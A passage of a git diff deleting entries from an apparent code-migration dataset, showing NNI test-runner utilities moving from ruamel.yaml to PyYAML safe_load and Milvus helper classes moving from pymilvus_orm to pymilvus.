flush=True) - try: - # wait restful server to be ready - time.sleep(3) - experiment_id = get_experiment_id(EXPERIMENT_URL) - while True: - waited_time = time.time() - bg_time - if waited_time > max_duration + 10: - print('waited: {}, max_duration: {}'.format(waited_time, max_duration)) - break - status = get_experiment_status(STATUS_URL) - if status in ['DONE', 'ERROR']: - print('experiment status:', status) - break - num_failed = len(get_failed_trial_jobs(TRIAL_JOBS_URL)) - if num_failed > 0: - print('failed jobs: ', num_failed) - break - time.sleep(1) - except: - print_experiment_log(experiment_id=experiment_id) - raise - print(str(datetime.datetime.now()), ' waiting done', flush=True) - if get_experiment_status(STATUS_URL) == 'ERROR': - print_experiment_log(experiment_id=experiment_id) - - trial_stats = get_trial_stats(TRIAL_JOBS_URL) - print(json.dumps(trial_stats, indent=4), flush=True) - if status != 'DONE' or trial_stats['SUCCEEDED'] + trial_stats['EARLY_STOPPED'] < max_trial_num: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise AssertionError('Failed to finish in maxExecDuration') - - -def case_excluded(name, excludes): - if name is None: - return False - if excludes is not None: - excludes = excludes.split(',') - for e in excludes: - if name in e or e in name: - return True - return False - - -def case_included(name, cases): - assert cases is not None - for case in cases.split(','): - if case in name: - return True - return False - - -def match_platform(test_case_config): - return sys.platform in test_case_config['platform'].split(' ') - - -def match_training_service(test_case_config, cur_training_service): - case_ts = test_case_config['trainingService'] - assert case_ts is not None - if case_ts == 'all': - return True - if cur_training_service in case_ts.split(' '): - return True - return False - - -def run(args): - it_config = get_yml_content(args.config) - - for test_case_config in it_config['testCases']: - name = test_case_config['name'] - if case_excluded(name, args.exclude): - print('{} excluded'.format(name)) - continue - if args.cases and not case_included(name, args.cases): - continue - - # fill test case default config - for k in it_config['defaultTestCaseConfig']: - if k not in test_case_config: - test_case_config[k] = it_config['defaultTestCaseConfig'][k] - print(json.dumps(test_case_config, indent=4)) - - if not match_platform(test_case_config): - print('skipped {}, platform {} not match [{}]'.format(name, sys.platform, test_case_config['platform'])) - continue - - if not match_training_service(test_case_config, args.ts): - print('skipped {}, training service {} not match [{}]'.format( - name, args.ts, test_case_config['trainingService'])) - continue - # remote mode need more time to cleanup - if args.ts == 'remote' or args.ts == 'hybrid': - wait_for_port_available(8080, 240) - else: - wait_for_port_available(8080, 60) - - # adl mode need more time to cleanup PVC - if args.ts == 'adl' and name == 'nnictl-resume-2': - time.sleep(30) - print('## {}Testing: {}{} ##'.format(GREEN, name, CLEAR)) - begin_time = time.time() - - run_test_case(test_case_config, it_config, args) - print('{}Test {}: TEST PASS IN {} SECONDS{}'.format(GREEN, name, int(time.time()-begin_time), CLEAR), flush=True) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument("--config", type=str, required=True) - parser.add_argument("--nni_source_dir", type=str, default='../') - 
parser.add_argument("--cases", type=str, default=None) - parser.add_argument("--exclude", type=str, default=None) - parser.add_argument("--ts", type=str, choices=['local', 'remote', 'pai', - 'kubeflow', 'frameworkcontroller', 'adl', 'aml', 'hybrid'], default='local') - args = parser.parse_args() - - run(args) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff deleted file mode 100644 index 1ae873b..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/test/nni_test/nnitest/utils.py b/test/nni_test/nnitest/utils.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/test/nni_test/nnitest/utils.py - +++ b/test/nni_test/nnitest/utils.py -@@ -9,7 +9,7 @@ import sys - import subprocess - import requests - import time --import ruamel.yaml as yaml -+import yaml - import shlex - - EXPERIMENT_DONE_SIGNAL = 'Experiment done' -@@ -43,12 +43,12 @@ def remove_files(file_list): - def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: -- return yaml.load(file, Loader=yaml.Loader) -+ return yaml.safe_load(file) - - def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: -- file.write(yaml.dump(content, default_flow_style=False)) -+ file.write(yaml.safe_dump(content, default_flow_style=False)) - - def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py deleted file mode 100644 index 566cb8e..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py +++ /dev/null @@ -1,181 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. 
- -import contextlib -import collections -import os -import socket -import sys -import subprocess -import requests -import time -import ruamel.yaml as yaml -import shlex - -EXPERIMENT_DONE_SIGNAL = 'Experiment done' - -GREEN = '\33[32m' -RED = '\33[31m' -CLEAR = '\33[0m' - -REST_ENDPOINT = 'http://localhost:8080' -API_ROOT_URL = REST_ENDPOINT + '/api/v1/nni' -EXPERIMENT_URL = API_ROOT_URL + '/experiment' -STATUS_URL = API_ROOT_URL + '/check-status' -TRIAL_JOBS_URL = API_ROOT_URL + '/trial-jobs' -METRICS_URL = API_ROOT_URL + '/metric-data' -GET_IMPORTED_DATA_URL = API_ROOT_URL + '/experiment/imported-data' - -def read_last_line(file_name): - '''read last line of a file and return None if file not found''' - try: - *_, last_line = open(file_name) - return last_line.strip() - except (FileNotFoundError, ValueError): - return None - -def remove_files(file_list): - '''remove a list of files''' - for file_path in file_list: - with contextlib.suppress(FileNotFoundError): - os.remove(file_path) - -def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: - return yaml.load(file, Loader=yaml.Loader) - -def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: - file.write(yaml.dump(content, default_flow_style=False)) - -def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' - if not installed: - os.environ['PATH'] = os.environ['PATH'] + ':' + os.getcwd() - sdk_path = os.path.abspath('../src/sdk/pynni') - cmd_path = os.path.abspath('../tools') - pypath = os.environ.get('PYTHONPATH') - if pypath: - pypath = ':'.join([pypath, sdk_path, cmd_path]) - else: - pypath = ':'.join([sdk_path, cmd_path]) - os.environ['PYTHONPATH'] = pypath - -def get_experiment_id(experiment_url): - experiment_id = requests.get(experiment_url).json()['id'] - return experiment_id - -def get_experiment_dir(experiment_url=None, experiment_id=None): - '''get experiment root directory''' - assert any([experiment_url, experiment_id]) - if experiment_id is None: - experiment_id = get_experiment_id(experiment_url) - return os.path.join(os.path.expanduser('~'), 'nni-experiments', experiment_id) - -def get_nni_log_dir(experiment_url=None, experiment_id=None): - '''get nni's log directory from nni's experiment url''' - return os.path.join(get_experiment_dir(experiment_url, experiment_id), 'log') - -def get_nni_log_path(experiment_url): - '''get nni's log path from nni's experiment url''' - return os.path.join(get_nni_log_dir(experiment_url), 'nnimanager.log') - -def is_experiment_done(nnimanager_log_path): - '''check if the experiment is done successfully''' - assert os.path.exists(nnimanager_log_path), 'Experiment starts failed' - - with open(nnimanager_log_path, 'r') as f: - log_content = f.read() - - return EXPERIMENT_DONE_SIGNAL in log_content - -def get_experiment_status(status_url): - nni_status = requests.get(status_url).json() - return nni_status['status'] - -def get_trial_stats(trial_jobs_url): - trial_jobs = requests.get(trial_jobs_url).json() - trial_stats = collections.defaultdict(int) - for trial_job in trial_jobs: - trial_stats[trial_job['status']] += 1 - return trial_stats - -def get_trial_jobs(trial_jobs_url, status=None): - '''Return failed trial jobs''' - trial_jobs = requests.get(trial_jobs_url).json() - res = [] - for trial_job in trial_jobs: - if status is None or trial_job['status'] == status: - res.append(trial_job) - return res - -def get_failed_trial_jobs(trial_jobs_url): - '''Return 
failed trial jobs''' - return get_trial_jobs(trial_jobs_url, 'FAILED') - -def print_file_content(filepath): - with open(filepath, 'r') as f: - content = f.read() - print(filepath, flush=True) - print(content, flush=True) - -def print_trial_job_log(training_service, trial_jobs_url): - trial_jobs = get_trial_jobs(trial_jobs_url) - for trial_job in trial_jobs: - trial_log_dir = os.path.join(get_experiment_dir(EXPERIMENT_URL), 'trials', trial_job['trialJobId']) - log_files = ['stderr', 'trial.log'] if training_service == 'local' else ['stdout_log_collection.log'] - for log_file in log_files: - print_file_content(os.path.join(trial_log_dir, log_file)) - -def print_experiment_log(experiment_id): - log_dir = get_nni_log_dir(experiment_id=experiment_id) - for log_file in ['dispatcher.log', 'nnimanager.log']: - filepath = os.path.join(log_dir, log_file) - print_file_content(filepath) - - print('nnictl log stderr:') - subprocess.run(shlex.split('nnictl log stderr {}'.format(experiment_id))) - print('nnictl log stdout:') - subprocess.run(shlex.split('nnictl log stdout {}'.format(experiment_id))) - -def parse_max_duration_time(max_exec_duration): - unit = max_exec_duration[-1] - time = max_exec_duration[:-1] - units_dict = {'s':1, 'm':60, 'h':3600, 'd':86400} - return int(time) * units_dict[unit] - -def deep_update(source, overrides): - """Update a nested dictionary or similar mapping. - - Modify ``source`` in place. - """ - for key, value in overrides.items(): - if isinstance(value, collections.Mapping) and value: - returned = deep_update(source.get(key, {}), value) - source[key] = returned - else: - source[key] = overrides[key] - return source - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET,socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - - -def wait_for_port_available(port, timeout): - begin_time = time.time() - while True: - if not detect_port(port): - return - if time.time() - begin_time > timeout: - msg = 'port {} is not available in {} seconds.'.format(port, timeout) - raise RuntimeError(msg) - time.sleep(1) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py deleted file mode 100644 index 3007990..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py +++ /dev/null @@ -1,181 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. 
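[Editor's note] Both copies of utils.py above define deep_update() with isinstance(value, collections.Mapping); that alias was deprecated in Python 3.3 and removed in 3.10, so the snapshot only runs on older interpreters. A standalone equivalent of the dataset's helper, written against collections.abc (a sketch, not part of the recorded files):

    from collections.abc import Mapping

    def deep_update(source, overrides):
        """Recursively merge ``overrides`` into ``source``, in place."""
        for key, value in overrides.items():
            if isinstance(value, Mapping) and value:
                source[key] = deep_update(source.get(key, {}), value)
            else:
                source[key] = value
        return source

    base = {"trial": {"command": "python3 run.py", "gpuNum": 1}}
    deep_update(base, {"trial": {"command": "python run.py"}})
    # base == {"trial": {"command": "python run.py", "gpuNum": 1}}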
- -import contextlib -import collections -import os -import socket -import sys -import subprocess -import requests -import time -import yaml -import shlex - -EXPERIMENT_DONE_SIGNAL = 'Experiment done' - -GREEN = '\33[32m' -RED = '\33[31m' -CLEAR = '\33[0m' - -REST_ENDPOINT = 'http://localhost:8080' -API_ROOT_URL = REST_ENDPOINT + '/api/v1/nni' -EXPERIMENT_URL = API_ROOT_URL + '/experiment' -STATUS_URL = API_ROOT_URL + '/check-status' -TRIAL_JOBS_URL = API_ROOT_URL + '/trial-jobs' -METRICS_URL = API_ROOT_URL + '/metric-data' -GET_IMPORTED_DATA_URL = API_ROOT_URL + '/experiment/imported-data' - -def read_last_line(file_name): - '''read last line of a file and return None if file not found''' - try: - *_, last_line = open(file_name) - return last_line.strip() - except (FileNotFoundError, ValueError): - return None - -def remove_files(file_list): - '''remove a list of files''' - for file_path in file_list: - with contextlib.suppress(FileNotFoundError): - os.remove(file_path) - -def get_yml_content(file_path): - '''Load yaml file content''' - with open(file_path, 'r') as file: - return yaml.safe_load(file) - -def dump_yml_content(file_path, content): - '''Dump yaml file content''' - with open(file_path, 'w') as file: - file.write(yaml.safe_dump(content, default_flow_style=False)) - -def setup_experiment(installed=True): - '''setup the experiment if nni is not installed''' - if not installed: - os.environ['PATH'] = os.environ['PATH'] + ':' + os.getcwd() - sdk_path = os.path.abspath('../src/sdk/pynni') - cmd_path = os.path.abspath('../tools') - pypath = os.environ.get('PYTHONPATH') - if pypath: - pypath = ':'.join([pypath, sdk_path, cmd_path]) - else: - pypath = ':'.join([sdk_path, cmd_path]) - os.environ['PYTHONPATH'] = pypath - -def get_experiment_id(experiment_url): - experiment_id = requests.get(experiment_url).json()['id'] - return experiment_id - -def get_experiment_dir(experiment_url=None, experiment_id=None): - '''get experiment root directory''' - assert any([experiment_url, experiment_id]) - if experiment_id is None: - experiment_id = get_experiment_id(experiment_url) - return os.path.join(os.path.expanduser('~'), 'nni-experiments', experiment_id) - -def get_nni_log_dir(experiment_url=None, experiment_id=None): - '''get nni's log directory from nni's experiment url''' - return os.path.join(get_experiment_dir(experiment_url, experiment_id), 'log') - -def get_nni_log_path(experiment_url): - '''get nni's log path from nni's experiment url''' - return os.path.join(get_nni_log_dir(experiment_url), 'nnimanager.log') - -def is_experiment_done(nnimanager_log_path): - '''check if the experiment is done successfully''' - assert os.path.exists(nnimanager_log_path), 'Experiment starts failed' - - with open(nnimanager_log_path, 'r') as f: - log_content = f.read() - - return EXPERIMENT_DONE_SIGNAL in log_content - -def get_experiment_status(status_url): - nni_status = requests.get(status_url).json() - return nni_status['status'] - -def get_trial_stats(trial_jobs_url): - trial_jobs = requests.get(trial_jobs_url).json() - trial_stats = collections.defaultdict(int) - for trial_job in trial_jobs: - trial_stats[trial_job['status']] += 1 - return trial_stats - -def get_trial_jobs(trial_jobs_url, status=None): - '''Return failed trial jobs''' - trial_jobs = requests.get(trial_jobs_url).json() - res = [] - for trial_job in trial_jobs: - if status is None or trial_job['status'] == status: - res.append(trial_job) - return res - -def get_failed_trial_jobs(trial_jobs_url): - '''Return failed trial jobs''' - 
return get_trial_jobs(trial_jobs_url, 'FAILED') - -def print_file_content(filepath): - with open(filepath, 'r') as f: - content = f.read() - print(filepath, flush=True) - print(content, flush=True) - -def print_trial_job_log(training_service, trial_jobs_url): - trial_jobs = get_trial_jobs(trial_jobs_url) - for trial_job in trial_jobs: - trial_log_dir = os.path.join(get_experiment_dir(EXPERIMENT_URL), 'trials', trial_job['trialJobId']) - log_files = ['stderr', 'trial.log'] if training_service == 'local' else ['stdout_log_collection.log'] - for log_file in log_files: - print_file_content(os.path.join(trial_log_dir, log_file)) - -def print_experiment_log(experiment_id): - log_dir = get_nni_log_dir(experiment_id=experiment_id) - for log_file in ['dispatcher.log', 'nnimanager.log']: - filepath = os.path.join(log_dir, log_file) - print_file_content(filepath) - - print('nnictl log stderr:') - subprocess.run(shlex.split('nnictl log stderr {}'.format(experiment_id))) - print('nnictl log stdout:') - subprocess.run(shlex.split('nnictl log stdout {}'.format(experiment_id))) - -def parse_max_duration_time(max_exec_duration): - unit = max_exec_duration[-1] - time = max_exec_duration[:-1] - units_dict = {'s':1, 'm':60, 'h':3600, 'd':86400} - return int(time) * units_dict[unit] - -def deep_update(source, overrides): - """Update a nested dictionary or similar mapping. - - Modify ``source`` in place. - """ - for key, value in overrides.items(): - if isinstance(value, collections.Mapping) and value: - returned = deep_update(source.get(key, {}), value) - source[key] = returned - else: - source[key] = overrides[key] - return source - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET,socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - - -def wait_for_port_available(port, timeout): - begin_time = time.time() - while True: - if not detect_port(port): - return - if time.time() - begin_time > timeout: - msg = 'port {} is not available in {} seconds.'.format(port, timeout) - raise RuntimeError(msg) - time.sleep(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff deleted file mode 100644 index b51a84a..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff +++ /dev/null @@ -1,87 +0,0 @@ -diff --git a/benchmark_test/scripts/milvus_helpers.py b/benchmark_test/scripts/milvus_helpers.py - index 686eb089177760540e463c6829ccc0fec25e8469..89c7afc6548362e9bbf1dbf6142aabb02bc3bb93 100644 - --- a/benchmark_test/scripts/milvus_helpers.py - +++ b/benchmark_test/scripts/milvus_helpers.py -@@ -1,10 +1,7 @@ - import sys --from pymilvus_orm import connections, Index --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -+ - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST --from pymilvus_orm import utility - from logs import LOGGER - - -@@ -25,7 +22,7 @@ def set_collection(self, collection_name): - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: -- LOGGER.error("Failed to set collection: {}".format(e)) -+ 
LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection -@@ -94,8 +91,9 @@ def get_index_params(self, collection_name): - # Delete Milvus collection - def delete_collection(self, collection_name): - try: -- self.set_collection(collection_name) -- self.collection.drop() -+ # self.set_collection(collection_name) -+ # self.collection.drop() -+ utility.drop_collection(collection_name) - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: -@@ -126,6 +124,7 @@ def count(self, collection_name): - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - -+ # create a partition for Milvus - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): -@@ -134,23 +133,33 @@ def create_partition(self, collection_name, partition_name): - partition = self.collection.create_partition(partition_name) - return partition - -+ # drop index - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() -- -+ -+ # load data from disk to memory - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() -- -- def show_collection(self): -+ -+ # List all collections. -+ def list_collection(self): - return utility.list_collections() -- -+ -+ # Query the progress of loading. - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) -- -+ -+ # Query the progress of index building. - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) -- -- def release_mem(self, collection_name): -+ -+ # release collection data from memory -+ def release_data(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() -+ -+ # Calculate distance between two vector arrays. 
-+ def calculate_distance(self, vectors_left, vectors_right): -+ return utility.calc_distance(vectors_left, vectors_right) diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py deleted file mode 100644 index b5f437e..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py +++ /dev/null @@ -1,156 +0,0 @@ -import sys -from pymilvus_orm import connections, Index -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to set collection: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, - auto_id=False) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - else: - self.collection = Collection(collection_name) - return "collection {} exists".format(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors, ids=None): - try: - self.create_collection(collection_name) - # data = [vectors] - self.collection.insert([ids, vectors]) - # vids = mr.primary_keys - # self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name, index_params): - try: - self.set_collection(collection_name) - status = self.collection.create_index(field_name="embedding", index_params=index_params) - if not status.code: - self.collection.load() - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, index_params)) - return status - 
else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # get index info - def get_index_params(self, collection_name): - self.set_collection(collection_name) - return [index.params for index in self.collection.indexes] - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k, search_params): - try: - self.set_collection(collection_name) - # search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": nprobe}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): - return "This partition {} exists".format(partition_name) - else: - partition = self.collection.create_partition(partition_name) - return partition - - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() - - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() - - def show_collection(self): - return utility.list_collections() - - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) - - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) - - def release_mem(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py deleted file mode 100644 index 20fadaf..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py +++ /dev/null @@ -1,165 +0,0 @@ -import sys -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = 
Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, - auto_id=False) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - else: - self.collection = Collection(collection_name) - return "collection {} exists".format(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors, ids=None): - try: - self.create_collection(collection_name) - # data = [vectors] - self.collection.insert([ids, vectors]) - # vids = mr.primary_keys - # self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name, index_params): - try: - self.set_collection(collection_name) - status = self.collection.create_index(field_name="embedding", index_params=index_params) - if not status.code: - self.collection.load() - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, index_params)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # get index info - def get_index_params(self, collection_name): - self.set_collection(collection_name) - return [index.params for index in self.collection.indexes] - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - # self.set_collection(collection_name) - # self.collection.drop() - utility.drop_collection(collection_name) - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k, search_params): - try: - self.set_collection(collection_name) - # search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": nprobe}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = 
self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - - # create a partition for Milvus - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): - return "This partition {} exists".format(partition_name) - else: - partition = self.collection.create_partition(partition_name) - return partition - - # drop index - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() - - # load data from disk to memory - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() - - # List all collections. - def list_collection(self): - return utility.list_collections() - - # Query the progress of loading. - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) - - # Query the progress of index building. - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) - - # release collection data from memory - def release_data(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() - - # Calculate distance between two vector arrays. - def calculate_distance(self, vectors_left, vectors_right): - return utility.calc_distance(vectors_left, vectors_right) diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff deleted file mode 100644 index e268787..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,57 +0,0 @@ -diff --git a/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py b/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - index 89c7afc6548362e9bbf1dbf6142aabb02bc3bb93..a7f4c3f13e007116d88d9a2776f471a4e4f1fc81 100644 - --- a/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - +++ b/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py -@@ -1,13 +1,11 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -+ - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE --from pymilvus_orm import utility - from logs import LOGGER - - -+ - class MilvusHelper: - def __init__(self): - try: -@@ -25,7 +23,7 @@ def set_collection(self, collection_name): - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: -- LOGGER.error("Failed to load data to Milvus: {}".format(e)) -+ LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection -@@ -33,7 +31,7 @@ def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: -- LOGGER.error("Failed to load data to Milvus: 